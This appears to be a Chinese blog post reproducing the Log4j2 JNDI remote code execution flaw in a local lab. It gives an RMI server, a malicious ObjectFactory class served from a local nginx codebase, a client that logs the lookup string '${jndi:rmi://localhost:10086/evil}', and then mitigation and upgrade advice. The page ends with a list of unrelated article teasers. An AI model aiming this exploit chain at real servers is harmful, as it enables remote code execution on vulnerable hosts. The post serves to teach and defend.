liangbo7
liangbo7

log4j2远程代码执行漏洞复现

目录

描述:

代码复现:

执行结果:

漏洞解决方案:

描述:

       本次 Apache Log4j 远程代码执行漏洞,正是由于组件存在 Java JNDI 注入漏洞:当程序将用户输入的数据记入日志时,攻击者通过构造特殊请求,来触发 Apache Log4j2 中的远程代码执行漏洞,从而利用此漏洞在目标服务器上执行任意代码。

代码复现:

JDK: jdk1.8.0_191

开发工具:ideaIU-2018.3.6.win

远程代码下载服务器:nginx-1.20.0

项目结构

log4j2远程代码执行漏洞复现_第1张图片

 rmi-server:

log4j2远程代码执行漏洞复现_第2张图片




    
        rmi
        lb
        1.0-SNAPSHOT
    
    4.0.0

    rmi-client

    rmi-client
    
    http://www.example.com

    
        UTF-8
        1.8
        1.8
    

    
        
            junit
            junit
            4.11
            test
        
        
            org.apache.logging.log4j
            log4j-api
            2.14.0
        
        
            org.apache.logging.log4j
            log4j-core
            2.14.0
        
    



package com.lb.rmi.server;

import javax.naming.Reference;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;

public class RmiServer
{
   public static void main( String[] args ) throws Exception
    {
      String url = "http://127.0.0.1/";
      Registry createRegistry = LocateRegistry.createRegistry(10086);
      Reference r = new Reference("EviObj","com.lb.rmi.common.EviObj",url);
      System.out.println("start rmi server");
      com.sun.jndi.rmi.registry.ReferenceWrapper rw = new com.sun.jndi.rmi.registry.ReferenceWrapper(r);
      createRegistry.bind("evil", rw);
    }
}

rmi-common:

log4j2远程代码执行漏洞复现_第3张图片




    
        rmi
        lb
        1.0-SNAPSHOT
    
    4.0.0

    rmi-common

    rmi-common
    
    http://www.example.com

    
        UTF-8
        1.8
        1.8
    

    
        
            junit
            junit
            4.11
            test
        
    



package com.lb.rmi.common;

import javax.naming.Context;
import javax.naming.Name;
import javax.naming.spi.ObjectFactory;
import java.util.Hashtable;

public class EviObj implements ObjectFactory {

	static {
		System.out.println("侵入代码执行");
	}

	@Override
	public Object getObjectInstance(Object obj, Name name, Context nameCtx, Hashtable environment) throws Exception {
		return null;
	}
}

rmi-client:

log4j2远程代码执行漏洞复现_第4张图片




    
        rmi
        lb
        1.0-SNAPSHOT
    
    4.0.0

    rmi-client

    rmi-client
    
    http://www.example.com

    
        UTF-8
        1.8
        1.8
    

    
        
            junit
            junit
            4.11
            test
        
        
            org.apache.logging.log4j
            log4j-api
            2.14.0
        
        
            org.apache.logging.log4j
            log4j-core
            2.14.0
        
    




package com.lb.rmi.client;

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class RmiClient
{
	private static final Logger log = LogManager.getLogger();
	
    public static void main( String[] args ) throws Exception
    {
		//-Dcom.sun.jndi.rmi.object.trustURLCodebase=true -Dcom.sun.jndi.ldap.object.trustURLCodebase=true
		System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase","true");
		System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase","true");
    	String info = "${jndi:rmi://localhost:10086/evil}";
       log.info(">>,{}",info);

    }
}

 远程代码下载服务器:把rmi-common侵入代码编译后拷贝到nginx资源目录下

log4j2远程代码执行漏洞复现_第5张图片

能访问下载即可

 

执行结果:

log4j2远程代码执行漏洞复现_第6张图片

漏洞解决方案:

1、临时缓解方案

  • 在jvm参数中添加 -Dlog4j2.FORMATMsgNoLookups=true
  • 系统环境变量中将FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS设置为true
  • 创建 "log4j2.component.properties" 文件,文件中增加配置 "log4j2.formatMsgNoLookups=true"

2、彻底修复方案

  • 手动删除log4j-core-*.jar中org/apache/logging/log4j/core/lookup/JndiLookup.class,重启服务即可。
  • 升级到官方提供的 log4j-2.15.0-rc2 版本

你可能感兴趣的:(安全)

  • 软件测试面试怎么提升通过率?
    2025年软件测试面试技巧、软件测试简历包装、能一周光速拿到5个软件测试岗offer的方法|软件测试面试速成简历篇-3招抓住面试官眼球数字说话:写"发现58个缺陷"比"负责测试"强10倍技术组合:列出"Selenium+Python+Jenkins"这种工具链项目亮点:每个项目用1个具体成果,如"自动化覆盖率达70%"面试篇-5个必杀技测试思维:回答时按"功能-性能-安全-兼容性"分层说Bug案例
  • 进阶向:Django入门,从零开始构建一个Web应用 nightunderblackcat Python进阶djangopython后端
    一、Django是什么?想象你建房子需要砖头、水泥、设计图...Django就是Python的Web框架工具箱,它帮你准备好了:数据库管理用户登录系统网页模板引擎安全防护(防黑客攻击)你只需专注"盖房子"(业务逻辑),不用从烧砖开始!二、环境准备(5分钟搞定)安装Python官网下载Python3.8+:python.org安装时勾选AddPythontoPATH安装Django打开命令行(Win
  • 50.第二阶段x64游戏实战-代码实现特征码定位 计算机王 逆向学习x64游戏反游戏外挂c++汇编游戏攻防特征码搜索
    免责声明:内容仅供学习参考,请合法利用知识,禁止进行违法犯罪活动!本次游戏没法给内容参考于:微尘网络安全上一个内容:49.第二阶段x64游戏实战-封包-代码实现自动登录现在找了很多基址了,但是游戏一更新,代码就会有变化,然后之前找的基址就没法用了,有得重新找,这是一个体力活,为了避免重新找就可以使用特征码进行定位,特征码定位也不是绝对的,可能需要多个版本才能让它不出错,如果特征代码进行了改动也还是
  • JAVA内存区域划分 weixin_44612246 java开发语言redis
    根据《JAVA虚拟机规范》的规定,JAVA虚拟机在执行JAVA程序的过程中会把内存划分为不同的数据区域。不同类型的数据会存储在不同的区域,理解JAVA内存区域的工作细节对理解JAVA多线程、线程安全性有着重要意义。注意,JAVA内存区域的划分与我们常说的java内存模型JMM(JavaMemeryModel)是两个互不交叉的维度的概念,两者没有任何关系。JMM主要是将主内存和工作内存的关系、数据从
  • java中agent的作用
    一java中agent1.1agent-javaagent是Java虚拟机(JVM)提供的一个启动参数,用于在Java程序main方法执行之前,加载一个特殊的Java代理程序(JavaAgent)。它的核心作用是对运行中的Java程序进行字节码层面的动态修改、监控和增强。如安全审计/漏洞检测。-javaagent:/bankapp/deploy/raspant/raspant.jar
  • [ 渗透测试面试篇 ] 渗透测试面试题大集合(详解)(4-2)XSS注入相关面试题 寒蝉听雨[原ID_PowerShell] 面试总结渗透测试自学篇渗透测试面试分享渗透测试升职加薪网络安全XSS注入面试题网络安全面试题1024程序员节
    博主介绍‍博主介绍:大家好,我是_PowerShell,很高兴认识大家~✨主攻领域:【渗透领域】【数据通信】【通讯安全】【web安全】【面试分析】点赞➕评论➕收藏==养成习惯(一键三连)欢迎关注一起学习一起讨论⭐️一起进步文末有彩蛋作者水平有限,欢迎各位大佬指点,相互学习进步!渗透方向的岗位,涉及到的知识点是很广泛的。这里我总结了整个一系列的面试题,可能没有覆盖到全部的知识面,但是应该是比较全面的
  • 华为和H3c--交换技术
    华为和H3c–交换技术一、VLAN的作用和交换网络链路类以及VLAN封装1、VLAN的作用和优势1)VLAN的作用隔离广播域2)VLAN的优势降低广播网络占用带宽资源安全性强屏蔽VLAN间访问增强设备的稳定性2、隔离广播的方式1)物理隔离通过路由器设备实现成本高2)VLAN交换机创建VLAN将接口加入到不同的VLAN中,VLAN之间相互隔离一个VLAN表示一个广播域3、交换网络链路的类型和Trun
  • 嵌入式开发学习日志Day14(ARM体系架构——RTC及ADC)
    一、RTCRTC(实时时钟):非易失性在IMX6ULL内部SNVS(安全的非易失性存储器)提供RTC功能;原理图:二、ADC2.1基本概念ADC(模拟数字转换器):用于将连续变化的模拟信号转换为离散的数字信号以便数字系统对它进行处理;模拟信号:一般指连续变化的电压信号,其值在一定范围内变化;数字信号:由一系列离散数字表示仅取有限值,通常以二进制表示;2.2工作原理将模拟信号分割成一系列离散的取样,
  • OCCT 预览显示与永久显示设计哲学: 非破坏性编辑 (Non-destructive Editing) 设计模式
    在现代三维建模和计算机辅助设计(CAD)领域,用户的每一次操作都可能涉及复杂且耗时的计算。如何为用户提供一个既能实时响应、又能确保数据安全的操作环境,是软件架构设计的核心挑战之一。预览与永久应用分离的机制,正是非破坏性编辑(Non-destructiveEditing)这一核心设计模式的经典体现。非破坏性编辑,顾名思义,是指在编辑过程中,用户的任何尝试性操作都不会立即、永久地改变或破坏原始数据。系
  • 【web安全】远程命令执行(RCE)漏洞深度解析与攻防实践 KPX web安全安全web安全windowslinux漏洞
    目录摘要1.RCE漏洞概述1.1基本概念1.2漏洞危害等级2.RCE漏洞原理深度分析2.1漏洞产生条件2.2常见危险函数2.2.1PHP环境2.2.2Java环境2.2.3Python环境3.RCE利用技术进阶3.1基础注入技术扩展3.1.1命令分隔技术3.1.2参数注入技术3.2高级绕过技术3.2.1编码混淆3.2.2字符串拼接3.3盲注技术3.3.1时间延迟检测3.3.2DNS外带数据3.3.
  • SQLmap 使用指南:开启安全测试高效之旅
    SQLmap作为一款强大的开源自动化SQL注入工具,在安全测试领域扮演着至关重要的角色,它能够精准检测并有效利用Web应用程序中潜藏的SQL注入漏洞。但请务必牢记,其使用必须严格限定在合法授权的范围内,以确保不触碰法律红线。安装SQLmap在Windows系统中安装SQLmap,首先要确保已成功安装Python环境。因为SQLmap是基于Python开发的,Python环境是其运行的基础。安装好P
  • 嵌入式SoC多线程架构迁移多进程架构开发技巧 不脱发的程序猿 嵌入式嵌入式
    目录1、架构迁移步骤2、架构迁移的关键点3、迁移实例将嵌入式SoC开发从单进程多线程架构迁移多进程架构是一项需要谨慎规划和实施的任务,尤其在资源有限的嵌入式系统中。这种架构转变通常是为了提高系统的稳定性、隔离性、安全性和并发处理能力。在单进程多线程架构中,多个线程共享相同的内存空间、文件描述符和全局变量,适合处理轻量级任务并发。然而,这种架构的缺点在于:共享资源管理复杂:线程之间共享内存,容易引发
  • Netty案例:HTTP服务器开发方案
    目录1、需求2、核心设计思路3、代码实现4、部署与测试5、关键功能说明1、需求Netty服务器监听8080端口,支持浏览器访问、信息恢复和资源过滤功能2、核心设计思路HTTP协议处理:使用Netty的HTTP编解码器资源过滤:通过URI分析实现黑白名单状态恢复:利用ChannelHandlerContext维护请求状态安全控制:过滤危险资源类型和路径遍历攻击3、代码实现importio.netty
  • 终于有人把 Java 动态 SQL 写舒服了!支持任意嵌套、分页、一对多,你还在手搓 SQL 吗? javasql教程
    Java动态SQL构建新选择:告别繁琐XML,轻量、强类型的dynamic-sql2框架来了!在日常开发中,动态SQL一直是老生带的问题:XML拼接SQL,开发体验差、易出错直接字符串拼接SQL,存在严重安全障碍ORM框架虽好,但复杂查询时往往换不起来有没有一种方案,既能:✅保留原生SQL的灵活性✅摆脱XML、字符串的繁琐与不安全✅提供类型安全、链式流畅的开发体验答案是:dynamic-sql2,
  • Python, Rust 开发教育/医疗/文化资源去中心化分配APP Geeker-2025 pythonrust
    以下是为教育、医疗、文化资源设计的**去中心化分配APP**的完整技术方案,结合Python的灵活性和Rust的高性能与安全性,实现公平透明的资源分配:---###系统架构设计```mermaidgraphTDA[用户终端]-->B[区块链网络]A-->C[分配引擎]B-->D[智能合约]C-->E[资源数据库]D-->F[分配记录]subgraph技术栈C-.Rust.->G[核心分配算法]D-
  • FinalShell 4:Linux系统SSH连接与远程管理工具应用指南 虾仁芝麻卷
    本文还有配套的精品资源,点击获取简介:FinalShell4是专为Linux系统打造的集成化远程管理工具,以其强大的SSH连接功能著称,支持多种操作系统平台。该软件集成了丰富的终端模拟、会话管理、文件传输和性能优化等特性,提高了IT运维的效率和安全性。其内置的脚本支持和实时监控功能进一步加强了服务器管理的自动化和便捷性,使其成为IT专业人员的得力助手。1.SSH连接与安全远程操作SSH(Secur
  • AWS多账号管理终极指南:从安装配置到高效使用 ivwdcwso 运维与云原生aws云计算iam多账号cli
    引言:为什么需要多账号管理?在云计算时代,企业使用多个AWS账号已成为最佳实践。根据AWSWell-ArchitectedFramework,多账号架构可以:实现环境隔离(生产/测试/开发)满足不同业务单元的安全要求简化资源管理和成本分配符合合规性要求(如SOC2、ISO27001)本文将手把手带您完成从AWSCLI安装到多账号配置的全过程,特别针对中国区与全球区的混合使用场景。第一部分:AWSC
  • 论文调研_物联网漏洞检测综述 kitsch0x97 论文调研学习物联网
    AReviewofIoTFirmwareVulnerabilitiesandAuditingTechniques研究背景:物联网设备在工业、消费类等各个领域得到了广泛应用,实现了更高的自动化和生产率。然而,这些连网设备的高度依赖也带来了一系列网络安全威胁,特别是IoT设备固件漏洞问题,往往在开发和部署过程中被忽视。针对这一问题,亟需制定全面的安全策略,包括对IoT设备固件环境(软件组件、存储、配置
  • 去中心化钱包应用:数字货币时代的自由与安全之选
    小编介绍:10年专注商业模式设计及软件开发,擅长企业生态商业模式,商业零售会员增长裂变模式策划、商业闭环模式设计及方案落地;扶持10余个电商平台做到营收过千万,数百个平台达到百万会员,欢迎咨询。随着数字货币的兴起,去中心化钱包应用正逐渐成为投资者的新宠。这类应用以其独特的优势和特点,在保障用户资产安全、提升交易效率方面展现出了强大的潜力。本文将从去中心化钱包的定义、特点、优势以及未来发展等方面进行
  • Web3.0时代的安全悖论:去中心化如何反被中心化攻击? 5GOrDiejfgf web3安全去中心化
    详细内容扩展:技术解析:Solana链上RugPull攻击手法复盘(3亿美元被盗)中心化交易所安全措施对比(CoinbasevsBinance安全预算)合规框架:SEC监管动态:Howey测试最新应用案例税务合规工具:Chainalysis+CoinTracking集成方案投资建议:安全审计公司评级(CertikA级项目列表)硬件钱包对比评测(LedgerNanoXvsTrezorModelT)
  • EN 13501标准介绍 独二. 布线安全防火网络大数据信息与通信
    1.什么是EN13501?EN13501是欧洲防火标准(Euroclass),用于对建筑材料的防火性能进行分类。该标准适用于电缆、建筑板材、隔热材料、地板、天花板等,广泛应用于建筑行业、电缆布线、数据中心、智能楼宇以及其他需要防火安全的领域。EN13501-1是该系列标准中专门针对建筑产品的防火性能分类标准,其中EN13501-6主要用于电缆的防火性能评估。2.EN13501-1防火分类体系EN1
  • JA3指纹在Web服务器或WAF中集成方案 泡泡以安 爬虫技术服务器安全httpsJA3指纹
    一、概述JA3指纹技术可以通过多种方式集成到Web服务器或WAF中,实现对客户端的识别和安全防护。本文档详细介绍各种实现方案。详细请见:JA3指纹介绍二、Nginx集成方案2.1、使用NginxLua模块安装依赖#安装OpenResty(包含Nginx+Lua)wgethttps://openresty.org/download/openresty-1.21.4.1.tar.gztar-xzfop
  • JWT认证性能优化实战指南
    JWT认证性能优化实战指南一、技术背景与应用场景随着微服务与云原生架构的普及,基于Token的认证方式成为保证系统安全与可扩展性的首选方案。JWT(JSONWebToken)以其自包含、自验证、跨语言支持等优点,在分布式环境中广泛应用。但在高并发场景下,JWT的解析、签名与验证过程可能成为性能瓶颈。本篇文章将结合真实生产环境,深入剖析JWT认证的核心原理,重点分析性能瓶颈,并提供多种可落地的优化实
  • 52-【JavaScript-Day 52】告别“野路子”代码:ESLint、Prettier与Web安全入门 吴师兄大模型 javascript开发语言ecmascriptjava人工智能大模型ESLint
    Langchain系列文章目录01-玩转LangChain:从模型调用到Prompt模板与输出解析的完整指南02-玩转LangChainMemory模块:四种记忆类型详解及应用场景全覆盖03-全面掌握LangChain:从核心链条构建到动态任务分配的实战指南04-玩转LangChain:从文档加载到高效问答系统构建的全程实战05-玩转LangChain:深度评估问答系统的三种高效方法(示例生成、手
  • SSL证书现实中的使用意义 运维ssl证书
    SSL证书在现实中的使用意义重大,它是互联网安全通信的基石,主要从数据加密、身份验证、信任建立等多个层面保障网络交互的安全性,以下是详细说明:一、加密传输数据,防止信息泄露与篡改核心作用:通过SSL(SecureSocketsLayer)或TLS(TransportLayerSecurity)协议,对客户端(如浏览器)与服务器之间传输的数据进行加密。例如用户在网站输入的账号密码、银行卡信息、聊天
  • 短信验证码注册登录的Python实现:http.client与Requests实战 仰望尾迹云
    本文还有配套的精品资源,点击获取简介:短信验证码是用户注册和登录的常用安全措施。在Python中,http.client和Requests是两个关键模块,分别用于处理HTTP请求。http.client是Python标准库的一部分,适用于低级HTTP操作,而Requests是一个第三方库,提供了更简洁的HTTP请求处理方式。本课程将通过http.client.py和Requests.py两个文件的
  • 目标检测数据集——交通信号灯红绿灯检测数据集
    在智能交通系统迅速发展的背景下,准确且实时地识别交通信号灯的状态对于提升道路安全和优化交通流量管理至关重要。无论是自动驾驶汽车还是辅助驾驶技术,可靠地检测并理解交通信号灯的指示——特别是红灯与绿灯的区别——是确保交通安全、避免交通事故的关键环节之一。然而,复杂的光照条件、不同的天气状况以及信号灯被遮挡等情况都给交通信号灯的识别带来了不小的挑战。这是专门针对交通信号灯(尤其是红绿灯)检测的数据集,旨
  • UniApp 开发第一个项目 速易达网络 uni-app
    UniApp开发第一个项目全流程指南,涵盖环境搭建、项目创建、核心开发到调试发布,结合最新实践整理而成,适合零基础快速上手:一、环境准备(5分钟)安装开发工具HBuilderX(官方推荐IDE):下载App开发版,安装路径避免中文或空格微信开发者工具(调试小程序必备):官网下载,安装后开启服务端口(设置→安全设置)Node.js(可选):用于包管理,建议v18+️
  • 基于 SASL/SCRAM 让 Kafka 实现动态授权认证 zlt2000 Javajavaspringbootkafka
    一、说明在大数据处理和分析中ApacheKafka已经成为了一个核心组件。然而在生产环境中部署Kafka时,安全性是一个必须要考虑的重要因素。SASL(简单认证与安全层)和SCRAM(基于密码的认证机制的盐化挑战响应认证机制)提供了一种方法来增强Kafka集群的安全性。本文将从零开始部署ZooKeeper和Kafka并通过配置SASL/SCRAM和ACL(访问控制列表)来增强Kafka的安全性。二
  • application.yml 文件配置解析 前端小努力 springboot
    application.yml文件配置解析application.yml文件是SpringBoot应用程序中用于配置各种属性的主要文件之一。它可以配置的内容非常广泛,包括但不限于以下几类:服务器配置端口号服务器地址会话管理SSL配置数据源配置数据库URL用户名和密码JDBC驱动类名连接池配置JPA和Hibernate配置DDL自动更新策略SQL显示方言配置日志配置日志级别日志文件路径安全性配置基本
  • JAVA基础 灵静志远 位运算加载Date字符串池覆盖
    一、类的初始化顺序 1 (静态变量,静态代码块)-->(变量,初始化块)--> 构造器 同一括号里的,根据它们在程序中的顺序来决定。上面所述是同一类中。如果是继承的情况,那就在父类到子类交替初始化。 二、String 1 String a = "abc"; JAVA虚拟机首先在字符串池中查找是否已经存在了值为"abc"的对象,根
  • keepalived实现redis主从高可用 bylijinnan redis
    方案说明 两台机器(称为A和B),以统一的VIP对外提供服务 1.正常情况下,A和B都启动,B会把A的数据同步过来(B is slave of A) 2.当A挂了后,VIP漂移到B;B的keepalived 通知redis 执行:slaveof no one,由B提供服务 3.当A起来后,VIP不切换,仍在B上面;而A的keepalived 通知redis 执行slaveof B,开始
  • java文件操作大全 0624chenhong java
    最近在博客园看到一篇比较全面的文件操作文章,转过来留着。 http://www.cnblogs.com/zhuocheng/archive/2011/12/12/2285290.html 转自http://blog.sina.com.cn/s/blog_4a9f789a0100ik3p.html 一.获得控制台用户输入的信息    &nbs
  • android学习任务 不懂事的小屁孩 工作
    任务 完成情况 搞清楚带箭头的pupupwindows和不带的使用 已完成 熟练使用pupupwindows和alertdialog,并搞清楚两者的区别 已完成 熟练使用android的线程handler,并敲示例代码 进行中 了解游戏2048的流程,并完成其代码工作 进行中-差几个actionbar 研究一下android的动画效果,写一个实例 已完成 复习fragem
  • zoom.js 换个号韩国红果果 oom
    它的基于bootstrap 的 https://raw.github.com/twbs/bootstrap/master/js/transition.js  transition.js模块引用顺序 <link rel="stylesheet" href="style/zoom.css"> <script src=&q
  • 详解Oracle云操作系统Solaris 11.2 蓝儿唯美 Solaris
    当Oracle发布Solaris 11时,它将自己的操作系统称为第一个面向云的操作系统。Oracle在发布Solaris 11.2时继续它以云为中心的基调。但是,这些说法没有告诉我们为什么Solaris是配得上云的。幸好,我们不需要等太久。Solaris11.2有4个重要的技术可以在一个有效的云实现中发挥重要作用:OpenStack、内核域、统一存档(UA)和弹性虚拟交换(EVS)。 
  • spring学习——springmvc(一) a-john springMVC
    Spring MVC基于模型-视图-控制器(Model-View-Controller,MVC)实现,能够帮助我们构建像Spring框架那样灵活和松耦合的Web应用程序。   1,跟踪Spring MVC的请求 请求的第一站是Spring的DispatcherServlet。与大多数基于Java的Web框架一样,Spring MVC所有的请求都会通过一个前端控制器Servlet。前
  • hdu4342 History repeat itself-------多校联合五 aijuans 数论
    水题就不多说什么了。 #include<iostream>#include<cstdlib>#include<stdio.h>#define ll __int64using namespace std;int main(){ int t; ll n; scanf("%d",&t); while(t--)
  • EJB和javabean的区别 asia007 beanejb
    EJB不是一般的JavaBean,EJB是企业级JavaBean,EJB一共分为3种,实体Bean,消息Bean,会话Bean,书写EJB是需要遵循一定的规范的,具体规范你可以参考相关的资料.另外,要运行EJB,你需要相应的EJB容器,比如Weblogic,Jboss等,而JavaBean不需要,只需要安装Tomcat就可以了   1.EJB用于服务端应用开发, 而JavaBeans
  • Struts的action和Result总结 百合不是茶 strutsAction配置Result配置
        一:Action的配置详解:      下面是一个Struts中一个空的Struts.xml的配置文件     <?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE struts PUBLIC &quo
  • 如何带好自已的团队 bijian1013 项目管理团队管理团队
    在网上看到博客" 怎么才能让团队成员好好干活"的评论,觉得写的比较好。 原文如下: 我做团队管理有几年了吧,我和你分享一下我认为带好团队的几点: 1.诚信         对团队内成员,无论是技术研究、交流、问题探讨,要尽可能的保持一种诚信的态度,用心去做好,你的团队会感觉得到。 2.努力提
  • Java代码混淆工具 sunjing ProGuard
    Open Source Obfuscators ProGuard http://java-source.net/open-source/obfuscators/proguardProGuard is a free Java class file shrinker and obfuscator. It can detect and remove unused classes, fields, m
  • 【Redis三】基于Redis sentinel的自动failover主从复制 bit1129 redis
    在第二篇中使用2.8.17搭建了主从复制,但是它存在Master单点问题,为了解决这个问题,Redis从2.6开始引入sentinel,用于监控和管理Redis的主从复制环境,进行自动failover,即Master挂了后,sentinel自动从从服务器选出一个Master使主从复制集群仍然可以工作,如果Master醒来再次加入集群,只能以从服务器的形式工作。   什么是Sentine
  • 使用代理实现Hibernate Dao层自动事务 白糖_ DAOspringAOP框架Hibernate
    都说spring利用AOP实现自动事务处理机制非常好,但在只有hibernate这个框架情况下,我们开启session、管理事务就往往很麻烦。 public void save(Object obj){ Session session = this.getSession(); Transaction tran = session.beginTransaction(); try
  • maven3实战读书笔记 braveCS maven3
    Maven简介 是什么? Is a software project management and comprehension tool.项目管理工具 是基于POM概念(工程对象模型) [设计重复、编码重复、文档重复、构建重复,maven最大化消除了构建的重复] [与XP:简单、交流与反馈;测试驱动开发、十分钟构建、持续集成、富有信息的工作区]     功能:
  • 编程之美-子数组的最大乘积 bylijinnan 编程之美
    public class MaxProduct { /** * 编程之美 子数组的最大乘积 * 题目: 给定一个长度为N的整数数组,只允许使用乘法,不能用除法,计算任意N-1个数的组合中乘积中最大的一组,并写出算法的时间复杂度。 * 以下程序对应书上两种方法,求得“乘积中最大的一组”的乘积——都是有溢出的可能的。 * 但按题目的意思,是要求得这个子数组,而不
  • 读书笔记-2 chengxuyuancsdn 读书笔记
    1、反射 2、oracle年-月-日 时-分-秒 3、oracle创建有参、无参函数 4、oracle行转列 5、Struts2拦截器 6、Filter过滤器(web.xml) 1、反射 (1)检查类的结构 在java.lang.reflect包里有3个类Field,Method,Constructor分别用于描述类的域、方法和构造器。 2、oracle年月日时分秒 s
  • [求学与房地产]慎重选择IT培训学校 comsci it
          关于培训学校的教学和教师的问题,我们就不讨论了,我主要关心的是这个问题       培训学校的教学楼和宿舍的环境和稳定性问题       我们大家都知道,房子是一个比较昂贵的东西,特别是那种能够当教室的房子... &nb
  • RMAN配置中通道(CHANNEL)相关参数 PARALLELISM 、FILESPERSET的关系 daizj oraclermanfilespersetPARALLELISM
    RMAN配置中通道(CHANNEL)相关参数 PARALLELISM 、FILESPERSET的关系 转 PARALLELISM --- 我们还可以通过parallelism参数来指定同时"自动"创建多少个通道: RMAN > configure device type disk parallelism 3 ; 表示启动三个通道,可以加快备份恢复的速度。
  • 简单排序:冒泡排序 dieslrae 冒泡排序
    public void bubbleSort(int[] array){ for(int i=1;i<array.length;i++){ for(int k=0;k<array.length-i;k++){ if(array[k] > array[k+1]){
  • 初二上学期难记单词三 dcj3sjt126com sciet
    concert 音乐会 tonight 今晚 famous 有名的;著名的 song 歌曲 thousand 千 accident 事故;灾难 careless 粗心的,大意的 break 折断;断裂;破碎 heart 心(脏) happen  偶尔发生,碰巧 tourist 旅游者;观光者 science (自然)科学 marry 结婚 subject 题目;
  • I.安装Memcahce 1. 安装依赖包libevent Memcache需要安装libevent,所以安装前可能需要执行 Shell代码 收藏代码 dcj3sjt126com redis
    wget http://download.redis.io/redis-stable.tar.gz tar xvzf redis-stable.tar.gz cd redis-stable make   前面3步应该没有问题,主要的问题是执行make的时候,出现了异常。 异常一: make[2]: cc: Command not found 异常原因:没有安装g
  • 并发容器 shuizhaosi888 并发容器
       通过并发容器来改善同步容器的性能,同步容器将所有对容器状态的访问都串行化,来实现线程安全,这种方式严重降低并发性,当多个线程访问时,吞吐量严重降低。    并发容器ConcurrentHashMap       替代同步基于散列的Map,通过Lock控制。   &nb
  • Spring Security(12)——Remember-Me功能 234390216 Spring SecurityRemember Me记住我
    Remember-Me功能   目录   1.1     概述 1.2     基于简单加密token的方法 1.3     基于持久化token的方法 1.4     Remember-Me相关接口和实现
  • 位运算 焦志广 位运算
    一、位运算符C语言提供了六种位运算符: & 按位与 | 按位或 ^ 按位异或 ~ 取反 << 左移 >> 右移 1. 按位与运算 按位与运算符"&"是双目运算符。其功能是参与运算的两数各对应的二进位相与。只有对应的两个二进位均为1时,结果位才为1 ,否则为0。参与运算的数以补码方式出现。 例如:9&am
  • nodejs 数据库连接 mongodb mysql liguangsong mongodbmysqlnode数据库连接
    1.mysql 连接    package.json中dependencies加入     "mysql":"~2.7.0"    执行 npm install      在config 下创建文件 database.js    
  • java动态编译 olive6615 javaHotSpotjvm动态编译
        在HotSpot虚拟机中,有两个技术是至关重要的,即动态编译(Dynamic compilation)和Profiling。     HotSpot是如何动态编译Javad的bytecode呢?Java bytecode是以解释方式被load到虚拟机的。HotSpot里有一个运行监视器,即Profile Monitor,专门监视
  • Storm0.9.5的集群部署配置优化 roadrunners 优化storm.yaml
    nimbus结点配置(storm.yaml)信息: # Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional inf
  • 101个MySQL 的调节和优化的提示 tomcat_oracle mysql
     1. 拥有足够的物理内存来把整个InnoDB文件加载到内存中——在内存中访问文件时的速度要比在硬盘中访问时快的多。   2. 不惜一切代价避免使用Swap交换分区 – 交换时是从硬盘读取的,它的速度很慢。   3. 使用电池供电的RAM(注:RAM即随机存储器)。   4. 使用高级的RAID(注:Redundant Arrays of Inexpensive Disks,即磁盘阵列
  • zoj 3829 Known Notation(贪心) 阿尔萨斯 ZOJ
    题目链接:zoj 3829 Known Notation 题目大意:给定一个不完整的后缀表达式,要求有2种不同操作,用尽量少的操作使得表达式完整。 解题思路:贪心,数字的个数要要保证比∗的个数多1,不够的话优先补在开头是最优的。然后遍历一遍字符串,碰到数字+1,碰到∗-1,保证数字的个数大于等1,如果不够减的话,可以和最后面的一个数字交换位置(用栈维护十分方便),因为添加和交换代价都是1
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他